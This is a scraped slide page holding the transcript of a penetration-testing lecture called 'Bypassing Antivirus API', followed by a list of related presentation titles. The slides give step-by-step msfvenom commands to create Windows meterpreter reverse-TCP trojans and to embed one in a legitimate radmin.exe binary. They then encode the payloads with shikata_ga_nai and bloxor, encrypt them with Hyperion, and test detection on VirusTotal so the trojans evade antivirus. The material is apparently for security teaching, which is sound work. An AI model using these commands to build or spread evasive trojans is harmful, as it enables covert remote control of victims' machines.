Presentation is loading. Please wait.

Presentation is loading. Please wait.

Bypassing Antivirus API

Published byBlanche Shelton Modified over 6 years ago

Similar presentations

Presentation on theme: "Bypassing Antivirus API"— Presentation transcript:

1 Bypassing Antivirus API
Web Application Penetration Testing ‘17

2 Bypassing Antivirus API
Encoding malicious file so that it can’t be traced by the antivirus applications. Highlights – Creating Trojans using msfvenom. Encoding a Trojan. Shikata_ga_nai encoding. Multiencoding using msfvenom. Hyperion.

3 Creating Trojans using msfvenom
Trojan – Malicious/Bad code file. Creating a Trojan handler with msfvenom - Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [host ip] LPORT = [Desired Port] –x /usr/share/windows-binaries/radmin.exe –k –f exe > radmin.exe It will output trojaned radmin viewer with meterpreter reverse tcp shell. This will be used for exploiting windows target machine by running infected Radmin viewer.

4 Encoding a Trojan Trojan is encoded to be prevented from detecting by antivirus applications. Open kali terminal and type – Msfvenom –l encoders It will list encoders including their rank and description. x86/shikata_ga_nai is excellent ranked polymorphic XOR Additive Feedback Encoder.

5 Shikata_ga_nai Encoding
Shikata_ga_nai is in Japanese meaning “It can’t be helped” Encoding with shikata_ga_nai – Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [Host IP] LPORT = [Desired Port] –e x86/shikata_ga_nai –i 10 –f exe > Trojan.exe Upload the resulting binary to virus total website and check the results. The result will not be much efficient as antivirus developers check for the pre-define metaspoit templates. Results can be improved by multiencoding the Trojan.

6 Multiencoding using msfvenom
In this demonstration, shikata_ga_nai and bloxor encoding will be used for multiencoding. First create an encoded RAW binary with shikata_ga_nai which can be later encoded and output into executable. Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [Host IP] LPORT = [Desired Port] –e x86/shikata_ga_nai –i 10 –f raw > Trojan1.bin Now, again encode the output Raw binary using bloxor encoding. Msfvenom –p –f exe –a x86 – -platform windows –e x86/bloxor –i 10 > Trojan1.exe < Trojan1.bin Upload the output executable to virus total website, results will be far improved but yet not best.

7 Hyperion – Encrypting Meta Executable
Hyperion uses Advanced Execution Standard (AES) Encryption which is current industry standard encryption. {Backend process is much related to cryptography background}. Encrypting Meta Executable: Msfvenom –p windows/meterpreter/reverse_tcp LHOST = [Host IP] LPORT = [Desired Port] –f exe > meta.exe Cd Hyperion-1.0/ Wine ../hyperion ../meta.exe bypassavhyperion.exe Upload the output executable to virus total and check the result.

8 Thanks

Download ppt "Bypassing Antivirus API"

Similar presentations

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.
Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.
The MS Blaster worm Presented by: Zhi-Wen Ouyang.

The MS Blaster worm Presented by: Zhi-Wen Ouyang.
©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 6 Auditing Strategies & Demonstration Justin C. Klein Keane
Copyright © 1995-2009 Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.

Copyright © Clifford Neuman - UNIVERSITY OF SOUTHERN CALIFORNIA - INFORMATION SCIENCES INSTITUTE USC CSci530 Computer Security Systems Lecture.
Microarray data analysis A practical example using GEPAS.

Microarray data analysis A practical example using GEPAS.
MIRAGE CPSC 620 Project By Neeraj Jain Hiranmayi Pai.

MIRAGE CPSC 620 Project By Neeraj Jain Hiranmayi Pai.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Code Injection and Software Cracking’s Effect on Network Security Group 5 Jason Fritts Utsav Kanani Zener Bayudan ECE 4112 Fall 2007.

Code Injection and Software Cracking’s Effect on Network Security Group 5 Jason Fritts Utsav Kanani Zener Bayudan ECE 4112 Fall 2007.
1 Backdoors and Trojans. ECE 4112 - Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.

1 Backdoors and Trojans. ECE Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.
4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room 345 05/11/10.

4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10.
Chapter 15: Security (Part 1). The Security Problem Security must consider external environment of the system, and protect the system resources Intruders.

Chapter 15: Security (Part 1). The Security Problem Security must consider external environment of the system, and protect the system resources Intruders.
MIS 5212.001 Week 2 Site:

MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.

EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
Copyright (C) 2000, Network Associates Technology Inc. Advanced Windows NT/2000 Security (II) Beyond The User Command Shell… Into The Trusted Computing.

Copyright (C) 2000, Network Associates Technology Inc. Advanced Windows NT/2000 Security (II) Beyond The User Command Shell… Into The Trusted Computing.
Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.

Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.
Pivoting UTD Computer Security Group Scott Hand 10 October 2012.

Pivoting UTD Computer Security Group Scott Hand 10 October 2012.
Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.

Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.

Similar presentations

Ads by Google